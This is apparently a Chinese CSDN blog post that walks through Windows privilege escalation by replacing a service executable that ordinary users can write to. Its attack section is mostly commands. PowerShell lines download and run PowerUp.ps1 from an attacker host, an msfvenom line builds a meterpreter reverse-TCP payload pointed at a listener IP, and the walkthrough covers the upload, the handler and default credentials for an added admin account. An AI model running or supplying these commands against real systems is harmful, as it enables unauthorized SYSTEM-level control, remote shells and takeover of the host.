系统服务权限配置错误

最新推荐文章于 2024-09-29 15:45:59 发布
最新推荐文章于 2024-09-29 15:45:59 发布
阅读量359 收藏 4
点赞数 3
分类专栏: Windows提权 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68636078/article/details/142621644
版权

原理

windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,那么就可以替换该文件,并随着系统启动获得控制权限。windows服务是以system权限运行的,其文件夹、文件和注册表key-value都是受强制访问控制保护的。但是在某些情况下,操作系统中依然存在一些没有得到有效保护的服务。

利用条件

  1. 需要一个普通用户

  2. 某个服务的执行文件路径要用户可控

漏洞利用步骤

  1. 找到目标服务

    • 假设你发现了一个以test.exe命名的Windows服务,这个服务的可执行文件对普通用户(如User)具有写权限。

  2. 替换可执行文件

    • 将原始的test.exe重命名为其他名字(例如test_backup.exe)。

    • 将你的反弹Shell程序重命名为test.exe,并将其放置在相同的目录中。

  3. 重启服务或系统

    • 可以通过命令行停止并重启该服务,或者等待系统重启。

  4. 执行恶意代码

    • 当服务启动时,Windows会运行test.exe,而这个文件实际上是你的反向Shell。由于服务通常以SYSTEM权限运行,你的反向Shell也将以SYSTEM权限执行,从而实现权限提升。

工具

PowerUp.ps1位置

locate PrivescCheck
/usr/share/powershell-empire/empire/server/data/module_source/privesc

使用

列出易受攻击的服务

powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.74.128:8000/PowerUp.ps1'); Invoke-ALLChecks"

脚本的AllChecks模块会检测的通常应用对象如下:

  • 没有被引号引起来的服务的路径。

  • 服务的可执行文件的权限设置不当

  • Unattend.xml文件

  • 注册表键AlwaysInstallElevated

生成可添加管理员用户的恶意可执行文件

powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/PowerUp.ps1');Install-ServiceBinary -ServiceName SERVICE_NAME

 默认账密

user: join
passwd: Password123!

案例

运行脚本

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.74.128:8000/PowerUp.ps1');Invoke-ALLChecks"

检查服务可执行文件和参数权限

判断权限

 icacls "C:\Windows\tools\test.exe"

发现普通用户有完全控制权限

将test.exe重命名,进行备份

Rename-Item -Path 'C:\Windows\tools\test.exe' -NewName 'C:\Windows\tools\test_bak.exe'

msf生成木马,将其名字改为test.exe并移动到对应目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.74.128 lport=4444 prependmigrateprocess=explorer.exe prependmigrate=true -f exe > test.exe

# MSF框架上传
upload /opt/test.exe C:/Windows/tools

MSF监听  

handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 4444

等目标重启,重启之后,完成提权

 

可乐葡萄糖
关注
专栏目录
linux nfs权限配置,nfs服务权限配置
weixin_36115496的博客
05-06 4679
nfs服务权限配置 菜鹅小生关注2人评论18381人阅读2018-06-08 11:49:271、 查看系统是否已经安装了服务Rpm -qa | grep nfs2、 启动服务,并且开机自动运行Systemctl start nfsSystemctl enabled nfs3、 配置NFS服务(1) 创建共享文件,并在问价加下创建一个文档Mkdir /share/websEcho “this is...
Jenkins权限配置错误导致无法登录问题解决
漠效的博客
08-14 4075
前言 上一篇正好是用户权限配置,这一篇介绍的是jenkins因配置权限错误导致的无法登录的解决方法。 Jenkins权限配置,可参考下列链接: https://blog.csdn.net/GX_1_11_real/article/details/99429802 报错如下 Access Denied admin is missing the Overall/Read permissio...
Windows系统服务权限配置错误漏洞提权
yangbz123的博客
05-17 1885
目录漏洞介绍AccessChk工具介绍AccessChk常用参数漏洞检查AccessChk工具检查Powerup脚本检查Empire powerup模块检查MSF 上传脚本扫描漏洞利用漏洞防范如何创建服务删除服务参考文献 漏洞介绍 系统服务权限配置错误,在Windows系统中的服务权限配置的那么完美总会有被忽视的地方,这些没有得到严格保护的系统服务,往往会被攻击者利用,系统服务权限设置有问题时,往往会导致如下风险,1、服务未运行攻击者会利用生服务替换掉原来的服务重启后提权,2、服务运行无法停止攻击者会
权限提升:Windows 操作系统配置错误利用分析及防范
weixin_46104215的博客
11-29 3079
Windows 操作系统中,攻击者通常会通过系统内核溢出漏洞来提权,但如果碰到无法通过系统内核溢出漏洞提取所在服务权限的情况,就会利用系统中的配置错误来提权。Windows 操作系统中的常见配置错误包括管理员凭据配置错误服务配置错误、故意削弱的安全措施、用户权限过高等。 1.系统服务权限配置错误 Windows 系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,就可以将该文件替换...
利用Windows系统服务进行权限提升
内心不种满鲜花就会长满杂草
01-26 3484
提权是后渗透重要的一环节,如果当前获取的用户权限比较低,那么我们将无法访问受保护的系统资源或执行系统管理操作,影响后续的攻击过程。这要求我们通过各种手段将当前用户的权限进行提升,以满足后续攻击的要求。
NTP时间服务配置以及错误的总结
热门推荐
bug_maker
03-10 4万+
NTP全称是Network Time Protocol,也就是互联网时间协议,说到时间,就谈谈时间的一些概念吧; 时区 按照常识来说,一天被划分24小时,近似球体的地球是360度,所以使用经纬度为坐标,将全球划分为24个时区,每个时区是15度; 东八区 格林尼治时间为世界标准时间,又因为,东半球(格林尼治以东)的时间比较早,中国的经度在120E,是位于第八个时区,这里的中国表示北京或者上海,因...
Linux系统文件权限管理
CSDN
01-04 1万+
PAM 可以说是一套应用程序编程接口(Application Programming Interface,API)他提供了一连串的验证机制,只要使用者将验证阶段的需求告知 PAM 后,PAM 就能够回报使用者验证的结果(功或失败),由于 PAM 仅是一套验证的机制,又可以提供给其他程序所呼叫引用,因此不论你使用什么程序,都可以使用 PAM 来进行验证,如此一来,就能够让账号口令或者是其他方式的验证具有一致的结果,也让程序设计师方便处理验证的问题.
linux nfs 修改权限,nfs服务权限配置
weixin_30610431的博客
04-29 4584
1、 查看系统是否已经安装了服务Rpm -qa | grep nfs2、 启动服务,并且开机自动运行Systemctl start nfsSystemctl enabled nfs3、 配置NFS服务(1) 创建共享文件,并在问价加下创建一个文档Mkdir /share/websEcho “this is nfs” > nfs.txt(2) 配置nfs服务配置文件文件的每一行定义一个共享目...
Java权限管理系统完整案例
踮脚敲代码
12-30 1万+
一.开发工具 开发软件:JDK7.0、MyEclipse 2014 数据库:MySQL5.6 服务器:Tomcat7.0 二.系统介绍 本系统采用了 B/S 体系结构,以 MySql 作为数据库管理数据,以 JSP 作为前端开发语音,采用当前最流行的 SSM 框架(Spring+SpringMVC+MyBatis),标准的 MVC 模式,将整个系统划分为表现层,controller 层,service 层,dao 层四层。下面介绍主要功能: 2.1 权限管理 支持在线分配权限,以角色为表头、菜单为首列。动态
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2351
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
Jenkins配置权限错误导致找不到系统管理
憧憬是碎了满地凉凉的宝石
12-09 2992
问题描述: 今天在配置Jenkins用户权限的时候,由于没有添加管理员,就给先设置了权限,以至于应用之后,登录原来的账号,找不到系统管理。 解决方案: 1.因为使用yum安装的jenkins,所以需要找到JENKINS_HOME下的config.xml配置文件。 /var/lib/jenkins/ (默认的JENKINS_HOME) ls (查看内容) 2.我们可以在里面看到config.xml sudo vi config.xml (进入配置文件) i (修改)
烽火服务器安装系统,烽火服务器进入bios配置
weixin_35651102的博客
08-09 2786
烽火服务器进入bios配置 内容精选换一换通过在一台支持远程桌面的Windows系统或者Linux操作系统服务器上,部署客户端软件和浏览器,应用发布是将服务器和应用账户纳入云堡垒机管理的功能。用户获取应用发布访问权限后,通过应用账户的密码自动代填,访问客户端应用和Web应用,并以视频方式全程记录用户运维操作,实现对远程应用账户的安全管理和用户远程访问应用的操作审计。云堡垒机支持添Linux云服务器...
新版双向链表,添加了at, front, back, insert, emplace等为了兼容std.
weixin_42944928的博客
09-26 445
【代码】新版双向链表,添加了at, front, back, insert, emplace等为了兼容std.
C++软件试用期检测
一个大佬的博客
09-29 611
试用期已过,请先注册。
C# 泛型使用案例_C# 泛型使用整理
天马3798
09-28 526
2.泛型委托,输入参数,输出参数。2. 自定义规则和类型,求和处理。3.泛型任务,多线程,异步编程。1. 任意类型数据交换。
Java工具--stream流
最新发布
qq_55342245的博客
09-29 569
findFirst() 和 findAny() 都是获取列表中的第一条数据,但是findAny()操作,返回的元素是不确定的,对于同一个列表多次调用findAny()有可能会返回不同的值。使用findAny()是为了更高效的性能。如果是数据较少,串行地情况下,一般会返回第一个结果,如果是并行(parallelStream并行流)的情况,那就不能确保是第一个。使用 mapToInt() 求整数列表中的最大值、最小值、总和、平均值。使用 findAny() 和 findFirst() 获取第一条数据。
STL——map和set【map和set的介绍和使用】【multimap和multiset】
aaa114514aaaa的博客
09-26 1500
有关map和set容器的学习和使用【multimap和multiset的拓展学习】【有关map中[]的使用和原理详细解析】【map和set相关oj】
Java基于easyExcel的自定义表格格式
qq_48050838的博客
09-29 338
这里用的到easyExcel版本为3.3.4。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值